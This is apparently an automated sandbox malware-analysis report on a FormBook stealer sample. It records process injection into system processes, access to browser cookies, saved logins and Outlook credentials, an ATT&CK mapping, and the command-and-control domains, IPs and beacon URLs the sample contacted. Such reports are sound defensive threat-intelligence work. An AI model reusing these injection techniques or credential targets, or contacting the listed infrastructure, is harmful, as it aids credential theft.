Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\logman.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\logman.exe

Thread register set: target process: 3292

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\logman.exe

Thread APC queued: target process: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EF0008

Jump to behavior

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C687B1 LogonUserW,

0_2_00C687B1

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C13B3A

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00C148D7

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C74C53 mouse_event,

0_2_00C74C53

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C67CAF

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C6874B

Source: NWPZbNcRxL.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: NWPZbNcRxL.exe, WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C3862B cpuid

0_2_00C3862B

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C44E87

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C51E06 GetUserNameW,

0_2_00C51E06

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C43F3A

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C149A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\logman.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: NWPZbNcRxL.exe	Binary or memory string: WIN_81
Source: NWPZbNcRxL.exe	Binary or memory string: WIN_XP
Source: NWPZbNcRxL.exe	Binary or memory string: WIN_XPe
Source: NWPZbNcRxL.exe	Binary or memory string: WIN_VISTA
Source: NWPZbNcRxL.exe	Binary or memory string: WIN_7
Source: NWPZbNcRxL.exe	Binary or memory string: WIN_8
Source: NWPZbNcRxL.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00C86283
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00C86747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NWPZbNcRxL.exe	71%	ReversingLabs	Win32.Trojan.AutoitInject
NWPZbNcRxL.exe	46%	Virustotal		Browse
NWPZbNcRxL.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online	0%	Avira URL Cloud	safe
http://www.deacapalla.online/0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://www.lmueller.dev/z8lg/	0%	Avira URL Cloud	safe
https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCk	0%	Avira URL Cloud	safe
http://www.x3kwqc5tye4vl90y.top/iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw==	0%	Avira URL Cloud	safe
http://www.marketyemen.holdings/8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://www.odvfr.info/rl5p/	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/tw42/	0%	Avira URL Cloud	safe
http://www.odvfr.info/rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA==	0%	Avira URL Cloud	safe
http://www.valuault.store/nhb9/	0%	Avira URL Cloud	safe
http://www.fersigorta.xyz/2a2y/	0%	Avira URL Cloud	safe
http://www.vh5g.sbs/rjsl/	0%	Avira URL Cloud	safe
http://www.al-madinatraders.shop	0%	Avira URL Cloud	safe
http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX	0%	Avira URL Cloud	safe
http://www.al-madinatraders.shop/qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX6	0%	Avira URL Cloud	safe
http://www.lmueller.dev/z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX	0%	Avira URL Cloud	safe
http://www.marketyemen.holdings/8efo/	0%	Avira URL Cloud	safe
http://www.x3kwqc5tye4vl90y.top/iuei/	0%	Avira URL Cloud	safe
http://www.al-madinatraders.shop/qfbg/	0%	Avira URL Cloud	safe
http://www.deacapalla.online/0pui/	0%	Avira URL Cloud	safe
http://www.vh5g.sbs/rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw==	0%	Avira URL Cloud	safe
http://www.valuault.store/nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://www.Deacapalla.online	0%	Avira URL Cloud	safe
http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns	0%	Avira URL Cloud	safe
http://www.axis138ae.shop/j2vs/	0%	Avira URL Cloud	safe
http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSF	0%	Avira URL Cloud	safe
http://www.fersigorta.xyz/2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa	0%	Avira URL Cloud	safe
http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFn	0%	Avira URL Cloud	safe
http://www.f5jh81t3k1w8.sbs/blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw==	100%	Avira URL Cloud	malware
http://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA==	0%	Avira URL Cloud	safe
http://www.vh5g.sbs/	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.deacapalla.online	208.91.197.27	true	true	unknown
www.lmueller.dev	46.38.243.234	true	true	unknown
www.valuault.store	209.74.79.42	true	true	unknown
www.axis138ae.shop	104.21.48.1	true	true	unknown
www.vh5g.sbs	188.114.97.3	true	true	unknown
www.marketyemen.holdings	199.59.243.228	true	true	unknown
100millionjobs.africa	136.243.64.147	true	true	unknown
www.odvfr.info	47.254.140.255	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
zcdn.8383dns.com	134.122.133.80	true	true	unknown
www.f5jh81t3k1w8.sbs	154.213.39.66	true	true	unknown
al-madinatraders.shop	93.127.192.201	true	true	unknown
www.valdevez.net	unknown	unknown	false	unknown
www.elettrocoltura.info	unknown	unknown	false	unknown
www.al-madinatraders.shop	unknown	unknown	false	unknown
www.fersigorta.xyz	unknown	unknown	true	unknown
www.reynamart.store	unknown	unknown	false	unknown
www.100millionjobs.africa	unknown	unknown	false	unknown
www.envisionmedia.shop	unknown	unknown	false	unknown
www.x3kwqc5tye4vl90y.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.lmueller.dev/z8lg/	true	Avira URL Cloud: safe	unknown
http://www.deacapalla.online/0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.marketyemen.holdings/8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa	true	Avira URL Cloud: safe	unknown
http://www.odvfr.info/rl5p/	true	Avira URL Cloud: safe	unknown
